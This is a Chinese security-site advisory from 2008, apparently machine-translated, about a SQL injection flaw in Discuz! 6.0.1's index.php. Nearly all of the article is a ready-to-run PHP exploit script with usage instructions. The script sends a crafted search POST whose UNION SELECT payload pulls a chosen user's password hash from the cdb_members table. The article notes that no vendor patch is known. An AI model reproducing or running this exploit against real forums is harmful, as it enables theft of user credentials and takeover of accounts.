首页 网络安全 安全学院 查看内容

discuz!"index.php"SQL注入漏洞

2008-8-16 15:51 879 0

摘要: discuz!很容易一个SQL注射漏洞,因为应用未能充分消毒用户提供投入使用前一个SQL查询。利用这个问题可以让攻击者妥协的应用,访问或修改数据,或利用潜在的脆弱性在背后的数据库。discuz!6.0...
关键词: nbsp data echo content host argv path port 攻击者 uid

discuz!很容易一个SQL注射漏洞,因为应用未能充分消毒用户提供投入使用前一个SQL查询。利用这个问题可以让攻击者妥协的应用,访问或修改数据,或利用潜在的脆弱性在背后的数据库。discuz!6.0.1是脆弱的;其他版本也可能受到影响攻击者可以利用浏览器来利用这个问题。下面的示例脚本是: <?phperror_reporting(E_ALL&E_NOTICE);print_r("+------------------------------------------------------------------+Exploit discuz6.0.1Just work as php>=5 & mysql>=4.1BY  james+------------------------------------------------------------------+");if($argc>4){$host=$argv[1];$port=$argv[2];$path=$argv[3];$uid=$argv[4];}else{echo "Usage: php ".$argv[0]." host port path uid\n";echo "host:      target server \n";echo "port:      the web port, usually 80\n";echo "path:      path to discuz\n";echo "uid :      user ID you wanna get\n";echo "Example:\r\n";echo "php ".$argv[0]." localhost 80 1\n";exit;}$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";$data = "POST /".$path."/index.php"." HTTP/1.1\r\n";$data .= "Accept: */*\r\n";$data .= "Accept-Language: zh-cn\r\n";$data .= "Content-Type: application/x-www-form-urlencoded\r\n";$data .= "User-Agent: wap\r\n";$data .= "Host: ".$host."\r\n";$data .= "Content-length: ".strlen($content)."\r\n";$data .= "Connection: Close\r\n";$data .= "\r\n";$data .= $content."\r\n\r\n";$ock=fsockopen($host,$port);if (!$ock) {echo 'No response from '.$host;die;}fwrite($ock,$data);while (!feof($ock)) {  echo fgets($ock, 1024);}?>解决方案: 目前,我们不知道有任何供应商提供的修补程序。
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部